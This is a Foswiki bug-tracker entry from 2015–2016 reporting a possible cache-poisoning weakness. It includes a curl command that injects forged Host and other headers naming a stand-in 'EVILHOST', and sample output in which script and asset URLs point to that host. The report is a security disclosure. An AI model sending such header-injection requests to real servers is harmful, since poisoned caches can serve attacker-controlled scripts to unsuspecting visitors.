You are here: Foswiki>Tasks Web>Item13797 (03 Oct 2016, GeorgeClark)Edit Attach

Item13797: Possible cache poisoning

pencil
Priority: Security
Current State: No Action Required
Released In: n/a
Target Release: n/a
Applies To: Engine
Component:
Branches:
Reported By: JozefMojzis
Waiting For:
Last Change By: GeorgeClark
With some combination of the web-server configuration (what headers allowed to pass) and other things here is a probability to attack the Foswiki's cache:

for example the request:

curl --header "Referrer: EVILREF" --header "Host: EVILHOST" --header "Evilhead: EVILHEAD" http://foswiki.org/Sandbox/WebHome

could poisoning the cache. (Depends on the web-server config - how it allows (accepts) the Host: and other headers).

In the wrong server config it could result to:

...script class='script JQUERYPLUGIN::FOSWIKI::PREFERENCES foswikiPreferences' type='text/json' ...{
   "SYSTEMWEB" : "System",
   "SCRIPTURLPATH" : "/bin",
   "USERNAME" : "guest",
   "PUBURLPATH" : "/pub",
   "SERVERTIME" : "05 Oct 2015 - 22:33",
   "PUBURL" : "http://EVILHOST/pub",            #NOTE THIS
   "WIKIUSERNAME" : "Main.WikiGuest",
   "WIKINAME" : "WikiGuest",
   "WEB" : "Sandbox",
   "SKIN" : "natedit,pattern",
   "TOPIC" : "SuSu",
   "NAMEFILTER" : "[\\\\\\s\\*?~^\\$@%`\"'\\x26;|\\x3c>\\[\\]#\\x00-\\x1f]",
   "SCRIPTURL" : "http://EVILHOST/bin",    #ALSO THIS
   "USERSWEB" : "Main",
   "SCRIPTSUFFIX" : ""
}

Maybe it isn't a real threat - but better to know it.

The reason: Foswiki blindly outputs any HTTP_\w+ environment variable. For example the %ENV{HTTP_EVILHEAD}% - or the %ENV{HTTP_REFERRER}% in some topic could output (and cache) the crafted header values.

-- JozefMojzis - 05 Oct 2015

 

ItemTemplate edit

Summary Possible cache poisoning
ReportedBy JozefMojzis
Codebase trunk
SVN Range
AppliesTo Engine
Component
Priority Security
CurrentState No Action Required
WaitingFor
Checkins
TargetRelease n/a
ReleasedIn n/a
CheckinsOnBranches
trunkCheckins
masterCheckins
ItemBranchCheckins
Release02x01Checkins
Release02x00Checkins
Release01x01Checkins
Topic revision: r2 - 03 Oct 2016, GeorgeClark - This page was cached on 23 Nov 2020 - 16:49.

The copyright of the content on this website is held by the contributing authors, except where stated elsewhere. See Copyright Statement. Creative Commons License    Legal Imprint    Privacy Policy